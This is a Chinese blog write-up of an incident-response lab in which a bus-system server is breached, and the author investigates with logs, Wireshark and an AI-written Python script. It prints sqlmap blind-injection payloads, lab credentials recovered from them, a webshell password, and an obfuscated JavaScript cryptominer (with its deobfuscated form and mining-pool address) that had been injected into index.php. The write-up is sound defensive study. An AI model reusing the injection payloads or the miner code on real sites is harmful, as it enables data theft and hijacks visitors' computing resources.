玄机

这次行业赛考到了应急响应。开个文章记录一下应急响应相关的知识。

主要是以玄机上面的题为主,不得不说,玄机的题是真的贵啊!

应急响应之公交车系统应急排查

题目描述:

1
2
3
4
5
6
7
8
9
本环境侧重于流量分析,脚本编写,webshell检测,混淆代码检测(思路通用)仅供学习参考
版权:思而听(solar应急响应)、州弟学安全、青少年CTF
环境描述:
1. 思而听公交系统被黑客攻击,黑客通过web进行了攻击并获取了数据,然后获取了其中一位驾校师傅在FTP服务中的私密文件,其后黑客找到了任意文件上传漏洞进行了GETshell,控制了主机权限并植入了挖矿网页挖矿病毒,接下来你需要逐步排查。
注意:
1. 流量中的21端口对应2121、SSH端口为2223、80端口对应8099。
2. 当前开放端口为:2223(SSH)、8099(WEB)
3. 捕获的流量包以及对应的web日志登录系统成功后在根目录下:result.pcap、access.log
4. root的SSH密码为bussec123

步骤1

分析环境内的中间件日志,找到第一个漏洞(黑客获取数据的漏洞),然后通过分析日志、流量,通过脚本解出黑客获取的用户密码数据,提交获取的前两个用户名,提交格式:flag{zhangsan-wangli}

主要是分析Web中间件(比如Apache/IIS/Nginx)的日志,这里进入到/var/log下面就发现了apache,然后进到里面看日志,非常多的数据,几千条,找了两条观察发现是用的base64编码的payload,并且还是时间盲注。于是让AI去写了一个分析脚本,来得到盲注爆破得到的数据库名、表名、字段名、以及值。

1
2
3
4
5
6
7
8
9
10
11
172.17.0.1 - - [23/Jul/2025:03:16:15 +0000] "GET /search.php?query=KSBBTkQgNTk5NT1DQVNUKChDSFIoMTEzKXx8Q0hSKDk4KXx8Q0hSKDEwNyl8fENIUigxMTMpfHxDSFIoMTEzKSl8fChTRUxFQ1QgKENBU0UgV0hFTiAoNTk5NT01OTk1KSBUSEVOIDEgRUxTRSAwIEVORCkpOjp0ZXh0fHwoQ0hSKDExMyl8fENIUigxMTgpfHxDSFIoMTEyKXx8Q0hSKDExMil8fENIUigxMTMpKSBBUyBOVU1FUklDKSBBTkQgKDM2MTc9MzYxNw%3D%3D HTTP/1.1" 200 1307 "-" "sqlmap/1.9#stable (https://sqlmap.org)"
172.17.0.1 - - [23/Jul/2025:03:16:15 +0000] "GET /search.php?query=IEFORCA1OTk1PUNBU1QoKENIUigxMTMpfHxDSFIoOTgpfHxDSFIoMTA3KXx8Q0hSKDExMyl8fENIUigxMTMpKXx8KFNFTEVDVCAoQ0FTRSBXSEVOICg1OTk1PTU5OTUpIFRIRU4gMSBFTFNFIDAgRU5EKSk6OnRleHR8fChDSFIoMTEzKXx8Q0hSKDExOCl8fENIUigxMTIpfHxDSFIoMTEyKXx8Q0hSKDExMykpIEFTIE5VTUVSSUMp HTTP/1.1" 200 1299 "-" "sqlmap/1.9#stable (https://sqlmap.org)"
172.17.0.1 - - [23/Jul/2025:03:16:15 +0000] "GET /search.php?query=JykgQU5EIDU5OTU9Q0FTVCgoQ0hSKDExMyl8fENIUig5OCl8fENIUigxMDcpfHxDSFIoMTEzKXx8Q0hSKDExMykpfHwoU0VMRUNUIChDQVNFIFdIRU4gKDU5OTU9NTk5NSkgVEhFTiAxIEVMU0UgMCBFTkQpKTo6dGV4dHx8KENIUigxMTMpfHxDSFIoMTE4KXx8Q0hSKDExMil8fENIUigxMTIpfHxDSFIoMTEzKSkgQVMgTlVNRVJJQykgQU5EICgnZFlneSc9J2RZZ3k%3D HTTP/1.1" 200 1310 "-" "sqlmap/1.9#stable (https://sqlmap.org)"
172.17.0.1 - - [23/Jul/2025:03:16:15 +0000] "GET /search.php?query=JyBBTkQgNTk5NT1DQVNUKChDSFIoMTEzKXx8Q0hSKDk4KXx8Q0hSKDEwNyl8fENIUigxMTMpfHxDSFIoMTEzKSl8fChTRUxFQ1QgKENBU0UgV0hFTiAoNTk5NT01OTk1KSBUSEVOIDEgRUxTRSAwIEVORCkpOjp0ZXh0fHwoQ0hSKDExMyl8fENIUigxMTgpfHxDSFIoMTEyKXx8Q0hSKDExMil8fENIUigxMTMpKSBBUyBOVU1FUklDKSBBTkQgJ0l5TnAnPSdJeU5w HTTP/1.1" 200 1309 "-" "sqlmap/1.9#stable (https://sqlmap.org)"
172.17.0.1 - - [23/Jul/2025:03:16:15 +0000] "GET /search.php?query=IEFORCA1OTk1PUNBU1QoKENIUigxMTMpfHxDSFIoOTgpfHxDSFIoMTA3KXx8Q0hSKDExMyl8fENIUigxMTMpKXx8KFNFTEVDVCAoQ0FTRSBXSEVOICg1OTk1PTU5OTUpIFRIRU4gMSBFTFNFIDAgRU5EKSk6OnRleHR8fChDSFIoMTEzKXx8Q0hSKDExOCl8fENIUigxMTIpfHxDSFIoMTEyKXx8Q0hSKDExMykpIEFTIE5VTUVSSUMpLS0gREVITw%3D%3D HTTP/1.1" 200 1302 "-" "sqlmap/1.9#stable (https://sqlmap.org)"
172.17.0.1 - - [23/Jul/2025:03:16:15 +0000] "GET /search.php?query=KSBBTkQgODY5OCBJTiAoU0VMRUNUIChDSEFSKDExMykrQ0hBUig5OCkrQ0hBUigxMDcpK0NIQVIoMTEzKStDSEFSKDExMykrKFNFTEVDVCAoQ0FTRSBXSEVOICg4Njk4PTg2OTgpIFRIRU4gQ0hBUig0OSkgRUxTRSBDSEFSKDQ4KSBFTkQpKStDSEFSKDExMykrQ0hBUigxMTgpK0NIQVIoMTEyKStDSEFSKDExMikrQ0hBUigxMTMpKSkgQU5EICgyMjEyPTIyMTI%3D HTTP/1.1" 200 1295 "-" "sqlmap/1.9#stable (https://sqlmap.org)"
172.17.0.1 - - [23/Jul/2025:03:16:15 +0000] "GET /search.php?query=IEFORCA4Njk4IElOIChTRUxFQ1QgKENIQVIoMTEzKStDSEFSKDk4KStDSEFSKDEwNykrQ0hBUigxMTMpK0NIQVIoMTEzKSsoU0VMRUNUIChDQVNFIFdIRU4gKDg2OTg9ODY5OCkgVEhFTiBDSEFSKDQ5KSBFTFNFIENIQVIoNDgpIEVORCkpK0NIQVIoMTEzKStDSEFSKDExOCkrQ0hBUigxMTIpK0NIQVIoMTEyKStDSEFSKDExMykpKQ%3D%3D HTTP/1.1" 200 1286 "-" "sqlmap/1.9#stable (https://sqlmap.org)"
172.17.0.1 - - [23/Jul/2025:03:16:15 +0000] "GET /search.php?query=JykgQU5EIDg2OTggSU4gKFNFTEVDVCAoQ0hBUigxMTMpK0NIQVIoOTgpK0NIQVIoMTA3KStDSEFSKDExMykrQ0hBUigxMTMpKyhTRUxFQ1QgKENBU0UgV0hFTiAoODY5OD04Njk4KSBUSEVOIENIQVIoNDkpIEVMU0UgQ0hBUig0OCkgRU5EKSkrQ0hBUigxMTMpK0NIQVIoMTE4KStDSEFSKDExMikrQ0hBUigxMTIpK0NIQVIoMTEzKSkpIEFORCAoJ3Z3dksnPSd2d3ZL HTTP/1.1" 200 1299 "-" "sqlmap/1.9#stable (https://sqlmap.org)"
172.17.0.1 - - [23/Jul/2025:03:16:15 +0000] "GET /search.php?query=JyBBTkQgODY5OCBJTiAoU0VMRUNUIChDSEFSKDExMykrQ0hBUig5OCkrQ0hBUigxMDcpK0NIQVIoMTEzKStDSEFSKDExMykrKFNFTEVDVCAoQ0FTRSBXSEVOICg4Njk4PTg2OTgpIFRIRU4gQ0hBUig0OSkgRUxTRSBDSEFSKDQ4KSBFTkQpKStDSEFSKDExMykrQ0hBUigxMTgpK0NIQVIoMTEyKStDSEFSKDExMikrQ0hBUigxMTMpKSkgQU5EICdkcnZ4Jz0nZHJ2eA%3D%3D HTTP/1.1" 200 1297 "-" "sqlmap/1.9#stable (https://sqlmap.org)"
172.17.0.1 - - [23/Jul/2025:03:16:15 +0000] "GET /search.php?query=IEFORCA4Njk4IElOIChTRUxFQ1QgKENIQVIoMTEzKStDSEFSKDk4KStDSEFSKDEwNykrQ0hBUigxMTMpK0NIQVIoMTEzKSsoU0VMRUNUIChDQVNFIFdIRU4gKDg2OTg9ODY5OCkgVEhFTiBDSEFSKDQ5KSBFTFNFIENIQVIoNDgpIEVORCkpK0NIQVIoMTEzKStDSEFSKDExOCkrQ0hBUigxMTIpK0NIQVIoMTEyKStDSEFSKDExMykpKS0tIE9lZ3g%3D HTTP/1.1" 200 1291 "-" "sqlmap/1.9#stable (https://sqlmap.org)"
172.17.0.1 - - [23/Jul/2025:03:16:15 +0000] "GET /search.php?

如果是线下断网,这脚本自己估计很难写出来,不得不感叹AI的强大,贴上:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
import re
import json
import base64
import urllib.parse
from collections import defaultdict
from datetime import datetime


def decode_payload(encoded_payload):
"""解码payload(URL解码 + Base64解码)"""
try:
url_decoded = urllib.parse.unquote(encoded_payload)
try:
base64_decoded = base64.b64decode(url_decoded).decode('utf-8')
return base64_decoded
except:
return url_decoded
except Exception as e:
return encoded_payload


def parse_apache_log(log_file):
"""解析Apache日志文件"""
requests = []

with open(log_file, 'r', encoding='utf-8') as f:
for line_num, line in enumerate(f, 1):
line = line.strip()
if not line or 'sqlmap' not in line:
continue

match = re.search(r'"GET\s+([^"]+)"\s+(\d+)\s+(\d+)', line)
if match:
url_path = match.group(1)
status_code = int(match.group(2))
response_size = int(match.group(3))

time_match = re.search(r'\[(\d{2}/\w{3}/\d{4}:\d{2}:\d{2}:\d{2})', line)
timestamp = time_match.group(1) if time_match else ''

requests.append({
'line_num': line_num,
'url_path': url_path,
'status_code': status_code,
'response_size': response_size,
'timestamp': timestamp,
'raw_line': line
})

return requests


def analyze_payload_v3(payload, response_size):
"""分析SQL注入payload - 针对sqlmap时间盲注优化"""
analysis = {
'type': 'unknown',
'database': '',
'table': '',
'column': '',
'position': 0,
'ascii_value': 0,
'limit_offset': 0,
'sleep_triggered': False,
'comparison_operator': '>',
'record_id': 0
}

# 精确的SLEEP触发判断
analysis['sleep_triggered'] = response_size == 1346

# 修正的SLEEP触发判断 - 基于实际日志分析
analysis['sleep_triggered'] = response_size < 1406

# 检测sqlmap特有的嵌套IF结构
if 'SLEEP(1-(IF(' in payload.upper():
analysis['type'] = 'time_blind_injection'

# 提取ORD(MID(...))结构中的信息
ord_mid_pattern = r'ORD\(MID\(\(SELECT\s+.*?FROM\s+(\w+)\.(\w+).*?LIMIT\s+(\d+),1\),(\d+),1\)\)([><!]=?)(\d+)'
match = re.search(ord_mid_pattern, payload, re.IGNORECASE)

if match:
analysis['database'] = match.group(1)
analysis['table'] = match.group(2)
analysis['limit_offset'] = int(match.group(3))
analysis['position'] = int(match.group(4))
analysis['comparison_operator'] = match.group(5)
analysis['ascii_value'] = int(match.group(6))
analysis['record_id'] = analysis['limit_offset']

# 提取字段名
field_pattern = r'CAST\((\w+)\s+AS'
field_match = re.search(field_pattern, payload, re.IGNORECASE)
if field_match:
analysis['column'] = field_match.group(1)

return analysis


def reconstruct_character_v3(comparisons):
"""基于sqlmap时间盲注逻辑重构字符"""
if not comparisons:
return None

# sqlmap的逻辑:SLEEP(1-IF(condition,0,1))
# condition为真时SLEEP(0)不延时,为假时SLEEP(1)延时
# 响应大小1346表示SLEEP触发(延时),即condition为假

min_val = 32
max_val = 126

for comp in sorted(comparisons, key=lambda x: x['ascii_value']):
ascii_val = comp['ascii_value']
sleep_triggered = comp['sleep_triggered']
operator = comp.get('comparison_operator', '>')

if operator == '!=':
if sleep_triggered:
# SLEEP触发,condition为假,即字符 == ascii_val
return ascii_val
else:
# SLEEP未触发,condition为真,即字符 != ascii_val
# 排除这个值,继续处理其他比较
continue
if operator == '>':
if sleep_triggered:
# SLEEP触发,condition为假,即字符 <= ascii_val
max_val = min(max_val, ascii_val)
else:
# SLEEP未触发,condition为真,即字符 > ascii_val
min_val = max(min_val, ascii_val + 1)
elif operator == '<':
if sleep_triggered:
# SLEEP触发,condition为假,即字符 >= ascii_val
min_val = max(min_val, ascii_val)
else:
# SLEEP未触发,condition为真,即字符 < ascii_val
max_val = min(max_val, ascii_val - 1)

# 返回收敛结果
if min_val == max_val:
return min_val
elif min_val < max_val:
return min_val
else:
return None


def reconstruct_data_v3(payload_analyses):
"""重构被提取的数据 - 针对sqlmap优化"""
results = {
'database': '',
'tables': [],
'columns': {},
'data': {}
}

# 收集数据提取信息
data_extractions = defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(list))))

for analysis in payload_analyses:
if analysis['type'] == 'time_blind_injection' and analysis['table'] and analysis['column']:
# 设置基本信息
if not results['database']:
results['database'] = analysis['database']

table_name = analysis['table']
if table_name not in results['tables']:
results['tables'].append(table_name)

table_key = f"{analysis['database']}.{analysis['table']}"
column = analysis['column']

# 记录列信息
if table_key not in results['columns']:
results['columns'][table_key] = []
if column not in results['columns'][table_key]:
results['columns'][table_key].append(column)

# 收集字符比较数据
if analysis['position'] > 0:
record_id = analysis['record_id']
position = analysis['position']

data_extractions[table_key][column][record_id][position].append({
'ascii_value': analysis['ascii_value'],
'sleep_triggered': analysis['sleep_triggered'],
'comparison_operator': analysis['comparison_operator']
})

# 重构字符串数据
for table_key, columns in data_extractions.items():
results['data'][table_key] = {}

for column, records in columns.items():
reconstructed_records = []

for record_id in sorted(records.keys()):
positions = records[record_id]

if positions:
max_pos = max(positions.keys())
chars = []

for pos in range(1, max_pos + 1):
if pos in positions:
char_code = reconstruct_character_v3(positions[pos])
if char_code and 32 <= char_code <= 126:
chars.append(chr(char_code))
elif char_code == 0:
break
else:
break

reconstructed_value = ''.join(chars)
if reconstructed_value and len(reconstructed_value) >= 1:
reconstructed_records.append({
'record_id': record_id,
'value': reconstructed_value
})

if reconstructed_records:
reconstructed_records.sort(key=lambda x: x['record_id'])
results['data'][table_key][column] = [r['value'] for r in reconstructed_records]

return results


def main():
log_file = 'access.log'

print("开始分析SQL时间盲注攻击 - V3完美版本...")

# 解析日志文件
print(f"解析Apache日志文件: {log_file}")
requests = parse_apache_log(log_file)
print(f"成功加载 {len(requests)} 行相关日志")

if not requests:
print("未找到相关的SQL注入请求")
return

# 提取和解码payload
print("提取HTTP请求...")
relevant_requests = []

for req in requests:
if 'query=' in req['url_path']:
match = re.search(r'query=([^&\s]+)', req['url_path'])
if match:
encoded_payload = match.group(1)
decoded_payload = decode_payload(encoded_payload)

req['encoded_payload'] = encoded_payload
req['decoded_payload'] = decoded_payload
relevant_requests.append(req)

print(f"找到 {len(relevant_requests)} 个相关请求")

# 分析payload
print("解码和分析payload...")
payload_analyses = []

for req in relevant_requests:
analysis = analyze_payload_v3(req['decoded_payload'], req['response_size'])
analysis['request'] = req
payload_analyses.append(analysis)

# 重构被提取的数据
print("重构被提取的数据...")
results = reconstruct_data_v3(payload_analyses)

# 生成报告
print("\n" + "=" * 60)
print("SQL时间盲注攻击分析报告 - V3完美版本")
print("=" * 60)

if results['database']:
print(f"\n[+] 目标数据库: {results['database']}")

if results['tables']:
print(f"\n[+] 发现的表:")
for table in results['tables']:
print(f" - {table}")

if results['columns']:
print(f"\n[+] 发现的列结构:")
for table_key, columns in results['columns'].items():
print(f" {table_key}:")
for column in columns:
print(f" - {column}")

if results['data']:
print(f"\n[+] 成功提取的数据:")
for table_key, columns in results['data'].items():
print(f" {table_key}:")
for column, records in columns.items():
if records:
print(f" {column}: {records}")
else:
print(f"\n[-] 未能提取到具体数据")

# 保存详细分析结果
output_data = {
'results': results,
'total_requests': len(relevant_requests),
'analysis_time': datetime.now().isoformat()
}

with open('sql_injection_analysis_v3.json', 'w', encoding='utf-8') as f:
json.dump(output_data, f, indent=2, ensure_ascii=False)

print(f"\n[+] 详细分析结果已保存到 sql_injection_analysis_v3.json")


if __name__ == '__main__':
main()

得到输出:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
{
"results": {
"database": "INFORMATION_SCHEMA",
"tables": [
"SCHEMATA",
"TABLES",
"COLUMNS",
"bus_drivers"
],
"columns": {
"INFORMATION_SCHEMA.SCHEMATA": [
"schema_name"
],
"INFORMATION_SCHEMA.TABLES": [
"table_name"
],
"INFORMATION_SCHEMA.COLUMNS": [
"column_name"
],
"bus_system.bus_drivers": [
"employee_id",
"full_name",
"password",
"username"
]
},
"data": {
"INFORMATION_SCHEMA.SCHEMATA": {
"schema_name": [
"information_schema",
"bus_system"
]
},
"INFORMATION_SCHEMA.TABLES": {
"table_name": [
"bus_drivers",
"news",
"stops",
"routes",
"lost_items",
"route_stops"
]
},
"INFORMATION_SCHEMA.COLUMNS": {
"column_name": [
"id",
"eipleyee_ida",
"full_name",
"username",
"qassyqyqa",
"register_date"
]
},
"bus_system.bus_drivers": {
"employee_id": [
"BJ2024007",
"BJ2024005",
"BJ2024016",
"BJ2024011",
"BJ2024018",
"BJ2024014",
"BJ2024013",
"BJ2024017",
"BJ2024002",
"BJ2024015",
"BJ2024004",
"BJ2024010",
"BJ2024020",
"BJ2024019",
"BJ2024012",
"BJ2024009",
"BJ2024003",
"BJ2024001",
"BJ2024006",
"BJ2024008"
],
"full_name": [
" "
],
"password": [
"888888",
"Ch@19980808",
"cy1988",
"fengjuan88",
"gx_fly",
"hmm123456",
"JX777",
"kongli000",
"Lina_666",
"luyuan@bj",
"minmin99",
"password",
"sgd@top",
"tianmi_sweet",
"weiping",
"wJ_1995",
"wq2024",
"zhangwei123",
"zhaolei_01",
"zhoupeng2023"
],
"username": [
"sunyue",
"chenhao",
"changyuan",
"fengjuan",
"gaoxiang",
"hanmeimei",
"jiangxin",
"kongli",
"lina",
"luyuan",
"liumin",
"zhengfei",
"shigandang",
"tianmi",
"weiping",
"wujing",
"wangqiang",
"zhangwei",
"zhaolei",
"zhoupeng"
]
}
}
},
"total_requests": 5752,
"analysis_time": "2025-11-30T20:31:09.957102"
}

所以提交的flag为:flag{sunyue-chenhao}

步骤2

黑客通过获取的用户名密码,利用密码复用技术,爆破了FTP服务,分析流量以后找到开放的FTP端口,并找到黑客登录成功后获取的私密文件,提交其文件中内容,提交格式:flag{xxx}

这里题目给的ftp端口是2121,另外ftp数据流会有一个特征 , “successfully”,我们利用这两点来过滤一下:

tcp.port==2121&&tcp contains "successfully"

应急响应1png.png

然后追踪一下tcp流,可以看到一些信息:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
220 (vsFTPd 3.0.3)
USER wangqiang
331 Please specify the password.
PASS wq2024
230 Login successful.
opts utf8 on
200 Always in UTF8 mode.
syst
215 UNIX Type: L8
site help
214 CHMOD UMASK HELP
PWD
257 "/home/wangqiang" is the current directory
TYPE A
200 Switching to ASCII mode.
PASV
227 Entering Passive Mode (192,168,37,4,195,83).
LIST
150 Here comes the directory listing.
226 Directory send OK.
noop
200 NOOP ok.
CWD /home/wangqiang/ftp/
250 Directory successfully changed.
TYPE A
200 Switching to ASCII mode.
PASV
227 Entering Passive Mode (192,168,37,4,195,87).
LIST
150 Here comes the directory listing.
226 Directory send OK.
noop
200 NOOP ok.
CWD /home/wangqiang/ftp/
250 Directory successfully changed.
noop
200 NOOP ok.
CWD /home/wangqiang/ftp/
250 Directory successfully changed.
PWD
257 "/home/wangqiang/ftp" is the current directory
CWD /home/wangqiang/ftp/
250 Directory successfully changed.
TYPE I
200 Switching to Binary mode.
PASV
227 Entering Passive Mode (192,168,37,4,195,85).
SIZE sensitive_credentials.txt
213 62
RETR sensitive_credentials.txt
150 Opening BINARY mode data connection for sensitive_credentials.txt (62 bytes).
226 Transfer complete.
CWD /home/wangqiang/ftp/
250 Directory successfully changed.
noop
200 NOOP ok.
CWD /home/wangqiang/ftp/
250 Directory successfully changed.
PWD
257 "/home/wangqiang/ftp" is the current directory
CWD /home/wangqiang/ftp/
250 Directory successfully changed.
TYPE I
200 Switching to Binary mode.
PASV
227 Entering Passive Mode (192,168,37,4,195,90).
SIZE sensitive_credentials.txt
213 62
RETR sensitive_credentials.txt
150 Opening BINARY mode data connection for sensitive_credentials.txt (62 bytes).
226 Transfer complete.
CWD /home/wangqiang/ftp/
250 Directory successfully changed.
421 Timeout.

很明显可以看到一段交互的FTP流量,其中 RETR sensitive_credentials.txt 就是传输下载文件的意思。

flag为该文件的内容,通过分析这段流量可以知道文件位于 /home/wangqiang/ftp目录下;提交即可。

步骤3

可恶的黑客找到了任意文件上传点,你需要分析日志和流量以及web开放的程序找到黑客上传的文件,提交木马使用的密码,提交格式:flag{password}

有个流量分析工具Zui,可以做一些直观展示的操作:

count() by id.orig_h,status_code,uri | status_code == 200 | sort -r count

pZMNOFx.png

有个shell1.php,这种就很像后门,并且文件上传一般都是POST方式,所以我们可以在wireshark在进行筛选过滤一下,然后追踪一下tcp流就发现了🐎

http.request.method==POST -> 追踪TCP流

应急响应3.png

flag{woaiwojia}

步骤4

删除黑客上传的木马并在/var/flag/1/flag查看flag值进行提交

这个没什么好说的,去/var/www/html/public/uploads 目录下面把 shell1.php删除就行了。这里猜测它是有一个check机制,发现这个文件不存在就会生成一个 /var/flag/1/flag 文件,然后读里面的内容就行了。

步骤5

分析流量,黑客植入了一个web挖矿木马,这个木马现实情况下会在用户访问后消耗用户的资源进行挖矿(本环境已做无害化处理),提交黑客上传这个文件时的初始名称,提交格式:flag{xxx.xxx}

步骤三中可以看到上传的马是哥斯拉,特征很明显。并且pass和key都给了。我们直接用工具来解密后面的流量;

流7109的流量解密下发现:

pZMNXY6.png

把index.php删了,我们接着去跟下一个流,看做了哪些操作,翻到流7113的时候,发现把map.php移到/var/www/html/public 目录下并重名为index.php:

应急响应5.png

我们再进容器看一下index.php文件,发现一段代码很可疑:

1
2
3
<script>
(function(){var _0x1c8d=['fromCharCode','|','4|1|3|0|2','split','log','This\x20will\x20never\x20run','random','floor','now','sqrt','sin','setTimeout','push','shift'];(function(_0x3e1a0f,_0x1c8d8d){var _0x5b3c2d=function(_0x5a1d5c){while(--_0x5a1d5c){_0x3e1a0f['push'](_0x3e1a0f['shift']());}};_0x5b3c2d(++_0x1c8d8d);}(_0x1c8d,0x1f4));var _0x5b3c=function(_0x3e1a0f,_0x1c8d8d){_0x3e1a0f=_0x3e1a0f-0x0;var _0x5b3c2d=_0x1c8d[_0x3e1a0f];return _0x5b3c2d;};var _0x1b8d5c=function(){var _0x5a1d5c=function(){var _0x3c7e4b=!![];return function(_0x1b1f8e,_0x5a1d5c){var _0x3c1a2b=_0x3c7e4b?function(){if(_0x5a1d5c){var _0x1b8d5c=_0x5a1d5c['apply'](_0x1b1f8e,arguments);_0x5a1d5c=null;return _0x1b8d5c;}}:function(){};_0x3c7e4b=![];return _0x3c1a2b;};}();var _0x3c7e4b=_0x1b8d5c(this,function(){var _0x1b1f8e=function(){var _0x5a1d5c;try{_0x5a1d5c=_0x1b8d5c('return\x20(function()\x20'+'{}.constructor(\"return\x20this\")()\x20'+');','');}catch(_0x3c1a2b){_0x5a1d5c=window;}return _0x5a1d5c;};var _0x5a1d5c=_0x1b1f8e();var _0x3c1a2b=_0x5a1d5c['console']=_0x5a1d5c['console']||{};var _0x1b8d5c=[_0x5b3c('0x4'),'warn','info','error','exception','table','trace'];for(var _0x5b3c2d=0x0;_0x5b3c2d<_0x1b8d5c['length'];_0x5b3c2d++){var _0x3c7e4b=_0x1b8d5c['constructor']['prototype']['bind'](_0x1b8d5c);var _0x1b1f8e=_0x1b8d5c[_0x5b3c2d];var _0x5a1d5c=_0x3c1a2b[_0x1b1f8e]||_0x3c7e4b;_0x3c7e4b['__proto__']=_0x1b8d5c['bind'](_0x1b8d5c);_0x3c7e4b['toString']=_0x5a1d5c['toString']['bind'](_0x5a1d5c);_0x3c1a2b[_0x1b1f8e]=_0x3c7e4b;}});_0x3c7e4b();var _0x1b1f8e={};_0x1b1f8e['p']=String[_0x5b3c('0x0')](103,117,108,102,46,109,111,110,101,114,111,111,99,101,97,110,46,115,116,114,101,97,109,58,49,48,49,50,56);_0x1b1f8e['l']=0.8;var _0x5b3c2d=function(){var _0x3c7e4b=_0x5b3c('0x2')[_0x5b3c('0x3')]('|');var _0x1b8d5c=0x0;while(!![]){switch(_0x3c7e4b[_0x1b8d5c++]){case'0':if(Math[_0x5b3c('0x7')](Math[_0x5b3c('0x6')]()*100)>100){console[_0x5b3c('0x4')](_0x5b3c('0x5'));}continue;case'1':while(Date[_0x5b3c('0x8')]()- _0x1b8d5c<100*_0x1b1f8e['l']){var _0x5a1d5c=10000;var _0x3c1a2b=0x0;for(var _0x3c7e4b=0x0;_0x3c7e4b<_0x5a1d5c;_0x3c7e4b++){_0x3c1a2b+=Math[_0x5b3c('0x9')](_0x3c7e4b)*Math[_0x5b3c('0xa')](_0x3c7e4b);}}continue;case'2':window[_0x5b3c('0xb')](_0x5b3c2d,100*(1-_0x1b1f8e['l']));continue;case'3':var _0x1b8d5c=Date[_0x5b3c('0x8')]();continue;case'4':continue;}break;}};_0x5b3c2d();}();
</script>

我们扔给AI去分析一下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
(function() {
// 原始代码的主要部分
var targetServer = String.fromCharCode(103, 117, 108, 102, 46, 109, 111, 110, 101, 114, 111, 111, 99, 101, 97, 110, 46, 115, 116, 114, 101, 97, 109, 58, 49, 48, 49, 50, 56);
// targetServer = "gulf.moneroocean.stream:10128"

var loadFactor = 0.8;

function runMiningScript() {
var startTime = Date.now();

// 这是一个计算密集型的循环,用于占用CPU资源
while(Date.now() - startTime < 100 * loadFactor) {
var iterations = 10000;
var result = 0;
for(var i = 0; i < iterations; i++) {
result += Math.sqrt(i) * Math.sin(i);
}
}

// 这个条件永远不会成立,所以永远不会执行
if(Math.floor(Math.random() * 100) > 100) {
console.log("This will never run");
}

// 设置定时器,递归调用自身
window.setTimeout(runMiningScript, 100 * (1 - loadFactor));
}

// 反调试代码 - 重写console对象的方法
(function() {
var originalConsole = window.console = window.console || {};
var methods = ['log', 'warn', 'info', 'error', 'exception', 'table', 'trace'];

for(var i = 0; i < methods.length; i++) {
var methodName = methods[i];
var originalMethod = originalConsole[methodName] || function() {};

// 重写console方法,使其更难调试
originalConsole[methodName] = (function(name, original) {
return function() {
try {
original.apply(this, arguments);
} catch(e) {
// 静默处理错误
}
};
})(methodName, originalMethod);
}
})();

// 启动挖矿脚本
runMiningScript();
})();

发现是个挖矿的脚本。所以map.php无疑了。

flag{map.php}

步骤6

分析流量并上机排查,黑客植入的网页挖矿木马所使用的矿池地址是什么,提交矿池地址(排查完毕后可以尝试删除它)提交格式:flag{xxxxxxx.xxxx.xxx:xxxx}

步骤五AI分析的代码已经给出矿池地址了:flag{gulf.moneroocean.stream:10128}

步骤7

清除掉混淆的web挖矿代码后在/var/flag/2/flag查看flag值并提交

直接进到index.php里面,把这段JS代码删除即可。